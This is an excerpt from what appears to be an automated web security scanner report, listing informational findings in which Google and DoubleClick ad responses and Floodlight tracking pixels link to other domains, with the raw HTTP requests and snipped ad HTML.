Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7149
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:56:48 GMT
Expires: Sat, 02 Apr 2011 12:56:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:25 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/free-easy-webex-together.html%3FTrackID%3D1024048"><img src="http://s0.2mdn.net/2830766/cisco_webex_Simple_AllText_728x90_r1.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
19.2. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:06 GMT
Expires: Sat, 02 Apr 2011 13:57:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1088

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standard Pixel Code -->
<img src="http://smp.adviva.net/track/v=4;m=1;t=7841;ts=<timestamp_here>" width="0" height="1" border="0" />
<!-- End of Standard Pixel Code -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1012592563/?label=n4a6CNXI7wEQs9_r4gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
19.3. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2178764;type=newkc987;cat=conta959;ord=1;num=5709919489454.478? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:18 GMT
Expires: Sat, 02 Apr 2011 13:57:18 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1085

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standard Pixel Code -->
<img src="http://smp.adviva.net/track/v=4;m=1;t=7842;ts=<timestamp_here>" width="0" height="1" border="0" />
<!-- End of Standard Pixel Code -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1012592563/?label=7tKGCO3F7wEQs9_r4gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
19.4. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbody.aol.com.html&dt=1301749206467&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749206485&frm=0&adk=1607234649&ga_vid=700876947.1301749206&ga_sid=1301749206&ga_hid=27150066&ga_fc=0&u_tz=-300&u_his=35&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=23&xpc=qMw2oFkjxX&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4287

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/body.aol.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.alot.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFSGoTASL1g_jhS_a52tAE9zZOFmg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.5. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-sso-xss.login.openx.org.html&dt=1301748315620&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748315625&frm=0&adk=1607234649&ga_vid=372530300.1301748316&ga_sid=1301748316&ga_hid=411579572&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=10&xpc=nI0nZrRtQ4&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4027

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cross-site-scripting-sso-xss.login.openx.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.vistaprint.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHhwlYpkGNoxnoLqjNe-7UsQl9sPw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.6. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-snas.nbcuni.com.html&dt=1301749112718&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749112730&frm=0&adk=1607234649&ga_vid=136358445.1301749113&ga_sid=1301749113&ga_hid=360555884&ga_fc=0&u_tz=-300&u_his=27&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=17&xpc=0AG2DbiWvO&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:56 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss-cross-site-scripting-snas.nbcuni.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.MuleSoft.com/Free_Download%26adT%3DDownload%2BTcat%2BServer%26adU%3Dwww.gosoftchoice.com/IBMAppScan%26adT%3DVulnerability%2BTool%26gl%3DUS&amp;usg=AFQjCNF3APsizVDBN9USKEGfXH82za-EYQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.7. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766310&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcross-site-scripting-sso-xss.login.openx.org.html&dt=1301748310547&bpp=9&shv=r20110324&jsv=r20110321-2&correlator=1301748310558&frm=0&adk=1607234649&ga_vid=1437402810.1301748311&ga_sid=1301748311&ga_hid=1169626367&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=CsHHt2H3Hu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:34 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4635

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
APiBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtxaOyaXZf9xjeuiOHLlrTRLmW800w%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB4SAHMhqXTaunCouBlgf52eSUCdbuheEBnru7zhGWk9-WSYCJehABGAEgvs7lDTgAUI3b18UEYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBTmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctc3NvLXhzcy5sb2dpbi5vcGVueC5vcmcuaHRtbIACAbgCGMACBcgC7uS2FKgDAegD3AXoA7oC6APiBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtxaOyaXZf9xjeuiOHLlrTRLmW800w%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cross-site-scripting-sso-xss.login.openx.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHMFVCzeB416yDiAw2gahb5FaWd8g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.8. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766814&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748814153&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748814161&frm=0&adk=1607234649&ga_vid=383323215.1301748814&ga_sid=1301748814&ga_hid=1924418977&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=13&xpc=Sgp5LVOPWN&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:52:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cross-site-scripting-xss.www.courchevel.com.html%26hl%3Dfr%26client%3Dca-pub-4063878933780912%26adU%3Dwww.booking.com%26adT%3DH%25C3%25B4tels%2B%25C3%25A0%2BCourchevel%26adU%3DFrontRange.com/Discovery%26adT%3DNetwork%2BDiscover%2BSoftware%26adU%3Dwww.virtualinstruments.com%26adT%3DSAN%2BI/O%2BPerformance%26gl%3DUS&amp;usg=AFQjCNEd84H5un3u38VPLiSpL43U9MzsYQ" target=_blank><img alt="Annonces Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-fr-100c-000000.png" width=91></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.9. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

